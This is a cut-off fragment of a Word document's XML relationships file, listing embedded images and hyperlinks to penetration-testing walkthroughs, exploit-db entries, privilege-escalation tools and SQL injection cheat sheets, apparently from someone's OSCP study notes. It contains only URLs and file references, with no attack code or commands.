Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image329.png"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image417.png"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image550.png"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.png"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/sshuttle/sshuttle" TargetMode="External"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image281.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId392" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image454.png"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/tools/audit/unix-privesc-check" TargetMode="External"/><Relationship Id="rId390" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/tools/audit/unix-privesc-chec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07.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.png"/><Relationship Id="rId1090" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secybr.com/posts/snmp-pentesting-best-practicies/" TargetMode="External"/><Relationship Id="rId1091" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image505.png"/><Relationship Id="rId1092" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId1093" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image564.png"/><Relationship Id="rId1094" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image271.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ayxantanirverdiyev6/pg-practice-kevin-walkthrough-c6f85d5bc0b9" TargetMode="External"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image207.png"/><Relationship Id="rId385" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-ground-practice-shenzi-10e684479eb9" TargetMode="External"/><Relationship Id="rId1095" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.png"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId384" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image154.png"/><Relationship Id="rId1096" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image522.png"/><Relationship Id="rId383" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image348.png"/><Relationship Id="rId1097" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.duplichecker.com/hex-to-text.php" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/SOCKS" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image170.png"/><Relationship Id="rId1098" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image399.png"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image410.png"/><Relationship Id="rId1099" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image358.png"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image429.png"/><Relationship Id="rId388" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mzet-/linux-exploit-suggester" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image291.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image355.png"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.razrsec.uk/lampiao-walkthrough/" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/brightio/penelope" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image501.png"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://freedium.cfd/https://medium.com/@yogasatriautama/pg-nukem-296392de8e96" TargetMode="External"/><Relationship Id="rId381" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mandoy.medium.com/pg-play-vulnhub-inclusiveness-writeup-c695005e22dd" TargetMode="External"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-medjed-7570cbbea087" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/SOCKS" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image352.png"/><Relationship Id="rId379" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-authby-96e74b36375a" TargetMode="External"/><Relationship Id="rId1080" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image511.png"/><Relationship Id="rId1081" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=MjddXhMF9vg&amp;t=1180s" TargetMode="External"/><Relationship Id="rId1082" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image211.png"/><Relationship Id="rId1083" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@robertip/oscp-practice-clamav-proving-ground-practice-943bb3dd5a99" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.png"/><Relationship Id="rId374" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-sybaris-491b23545014" TargetMode="External"/><Relationship Id="rId1084" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image344.png"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image540.png"/><Relationship Id="rId373" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image334.png"/><Relationship Id="rId1085" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-21-proving-grounds-clamav-774a396d568b" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image422.png"/><Relationship Id="rId372" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-ground-practice-shenzi-10e684479eb9" TargetMode="External"/><Relationship Id="rId1086" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/4761" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentesting.zeyu2001.com/proving-grounds/get-to-work/medjed?source=post_page-----09adfeceaa74---------------------------------------" TargetMode="External"/><Relationship Id="rId1087" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@robertip/oscp-practice-clamav-proving-ground-practice-943bb3dd5a99" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/smb/psexec.md" TargetMode="External"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/govolution/betterdefaultpasslist/blob/master/ftp.txt" TargetMode="External"/><Relationship Id="rId1088" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=vSnB0AZDvjM&amp;t=590s" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/smb/psexec.md" TargetMode="External"/><Relationship Id="rId377" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-authby-7d0391b0897c" TargetMode="External"/><Relationship Id="rId1089" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=MjddXhMF9vg&amp;t=3870s" TargetMode="External"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image248.png"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image323.png"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image395.png"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/govolution/betterdefaultpasslist/blob/master/ftp.txt" TargetMode="External"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Thigh_GoD/ligolo-ng-finally-adds-local-port-forwarding-5bf9b19609f9" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image314.png"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/nicocha30/ligolo-ng/releases" TargetMode="External"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image345.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image201.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.rapid7.com/metasploit/msf-overview/#Datastore" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.rapid7.com/metasploit/msf-overview/#Datastore" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@0x47M4D/double-pivoting-using-ligolo-ng-3b4094363ff2" TargetMode="External"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://systemweakness.com/double-pivoting-for-newbies-with-ligolo-ng-4177b3f1f27b" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@jamesjarviscyber/bbscute-write-up-walkthrough-offsec-provinggrounds-vulnhub-05bad5754e72" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image105.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image234.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image402.png"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ruby-lang.org/en/" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rebootuser/LinEnum" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image322.png"/><Relationship Id="rId395" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation" TargetMode="External"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/multi/handler/" TargetMode="External"/><Relationship Id="rId394" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/db/modules/exploit/multi/handler/" TargetMode="External"/><Relationship Id="rId393" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image426.png"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image215.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://manpages.ubuntu.com/manpages/xenial/en/man1/mousepad.1.html" TargetMode="External"/><Relationship Id="rId399" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://manpages.ubuntu.com/manpages/xenial/en/man1/mousepad.1.html" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ruby-lang.org/en/" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rebootuser/LinEnum" TargetMode="External"/><Relationship Id="rId808" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image254.png"/><Relationship Id="rId807" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image298.png"/><Relationship Id="rId806" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mandoy.medium.com/pg-play-vulnhub-inclusiveness-writeup-c695005e22dd" TargetMode="External"/><Relationship Id="rId805" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image470.png"/><Relationship Id="rId809" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@MEGAZORDI/oscp-practice-proving-grounds-fired-99745bfe2977" TargetMode="External"/><Relationship Id="rId800" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.png"/><Relationship Id="rId804" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image519.png"/><Relationship Id="rId803" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image536.png"/><Relationship Id="rId802" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sanaullahamankorai.medium.com/funbox-walkthrough-proving-grounds-play-5cd185a2f3f0" TargetMode="External"/><Relationship Id="rId801" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image228.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image481.png"/><Relationship Id="rId1334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0xk4b1r/CVE-2022-3552" TargetMode="External"/><Relationship Id="rId1335" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@diogo.g.c/pg-ctf-200-06-walkthrough-guide-f8c6f55c4588" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image241.png"/><Relationship Id="rId1336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-32-proving-grounds-marketing-bf040837eeff" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.northover.co/articles/robust-proving-grounds-practice" TargetMode="External"/><Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Y1LD1R1M-1337/Limesurvey-RCE?tab=readme-ov-file" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.northover.co/articles/robust-proving-grounds-practice" TargetMode="External"/><Relationship Id="rId1338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gbozyelg.medium.com/proving-grounds-practice-exfiltrated-4c11efba893d" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mandoy.medium.com/pg-play-vulnhub-inclusiveness-writeup-c695005e22dd" TargetMode="External"/><Relationship Id="rId1339" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49876" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image537.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image420.png"/><Relationship Id="rId509" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId508" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image449.png"/><Relationship Id="rId503" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection/cheat-sheet" TargetMode="External"/><Relationship Id="rId745" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@hughbrown123/walk-through-vulnhub-empire-breakout-362e240013d3" TargetMode="External"/><Relationship Id="rId987" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image114.png"/><Relationship Id="rId502" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/sql-injection#what-is-sql-injection-sqli" TargetMode="External"/><Relationship Id="rId744" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image341.png"/><Relationship Id="rId986" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455" TargetMode="External"/><Relationship Id="rId501" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/pentesting-web/sql-injection/index.html?highlight=SQL%20inject#what-is-sql-injection" TargetMode="External"/><Relationship Id="rId743" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId985" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455" TargetMode="External"/><Relationship Id="rId500" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=1nJgupaUPEQ" TargetMode="External"/><Relationship Id="rId742" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@hughbrown123/walk-through-vulnhub-empire-breakout-362e240013d3" TargetMode="External"/><Relationship Id="rId984" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image302.png"/><Relationship Id="rId507" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://banua.medium.com/proving-grounds-butch-oscp-prep-2025-practice-14-74a0857cf4bd" TargetMode="External"/><Relationship Id="rId749" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-23-proving-grounds-levram-d033737f0025" TargetMode="External"/><Relationship Id="rId506" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentesting.zeyu2001.com/proving-grounds/get-to-work/medjed?source=post_page-----09adfeceaa74---------------------------------------" TargetMode="External"/><Relationship Id="rId748" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image312.png"/><Relationship Id="rId505" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.northover.co/articles/robust-proving-grounds-practice#basic-union-attack" TargetMode="External"/><Relationship Id="rId747" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image231.png"/><Relationship Id="rId989" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/btrsys2.1" TargetMode="External"/><Relationship Id="rId504" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vaibhavc418/offensive-security-insanity-hosting-walkthrough-f036b27fcca9" TargetMode="External"/><Relationship Id="rId746" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId988" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image394.png"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/potato" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image134.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-62-proving-grounds-zipper-b49a52ed8e38" TargetMode="External"/><Relationship Id="rId741" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-sosimple-53-100-21453c1ef208" TargetMode="External"/><Relationship Id="rId983" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image412.png"/><Relationship Id="rId1330" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49973" TargetMode="External"/><Relationship Id="rId740" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image283.png"/><Relationship Id="rId982" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-loly-d8724b4466a3" TargetMode="External"/><Relationship Id="rId1331" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@august.vansickle/proving-grounds-astronaut-walkthrough-1f886c725dec" TargetMode="External"/><Relationship Id="rId981" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sec-fortress.github.io/posts/pg/posts/Shenzi.html" TargetMode="External"/><Relationship Id="rId1332" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/49788" TargetMode="External"/><Relationship Id="rId980" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image218.png"/><Relationship Id="rId1333" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-44-proving-grounds-bullybox-bc2918d6cbd6" TargetMode="External"/><Relationship Id="rId1323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/45987?source=post_page-----834e61a9fc03---------------------------------------" TargetMode="External"/><Relationship Id="rId1324" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/sorcerer" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://explore.whatismybrowser.com/useragents/parse/" TargetMode="External"/><Relationship Id="rId1325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image276.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image287.png"/><Relationship Id="rId1326" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image315.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://systemweakness.com/dc-4-vulnhub-98d97fb0fea4" TargetMode="External"/><Relationship Id="rId1327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/thewhiteh4t/warsend" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://explore.whatismybrowser.com/useragents/parse/" TargetMode="External"/><Relationship Id="rId1328" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@ardian.danny/oscp-practice-series-72-proving-grounds-sybaris-b362f337365c" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@malwarejoe/xposedapi-offsec-proving-grounds-lab-write-up-3848be2c61d3" TargetMode="External"/><Relationship Id="rId1329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@basha5969/astronaut-proving-grounds-09c2cf63de97" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-grounds-practice-nickel-f76b06f60db1" TargetMode="External"/><Relationship Id="rId739" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image169.png"/><Relationship Id="rId734" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image371.png"/><Relationship Id="rId976" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sec-fortress.github.io/posts/pg/posts/Shenzi.html" TargetMode="External"/><Relationship Id="rId733" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image404.png"/><Relationship Id="rId975" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-shenzi-6976f3938c83" TargetMode="External"/><Relationship Id="rId732" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Inching-Towards-Intelligence/pg-play-sunsetmidnight-84-100-bc230e87baa2" TargetMode="External"/><Relationship Id="rId974" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId731" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://h0j3n.medium.com/vulnhub-assertion-1-0-1-eb78a0cb9216" TargetMode="External"/><Relationship Id="rId973" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@Dpsypher/proving-ground-practice-shenzi-10e684479eb9" TargetMode="External"/><Relationship Id="rId738" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image336.png"/><Relationship Id="rId737" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image452.png"/><Relationship Id="rId979" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image237.png"/><Relationship Id="rId736" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/potato" TargetMode="External"/><Relationship Id="rId978" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@haadimdwork/sunset-midnight-walkthrough-proving-grounds-08ad53b2200a" TargetMode="External"/><Relationship Id="rId735" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 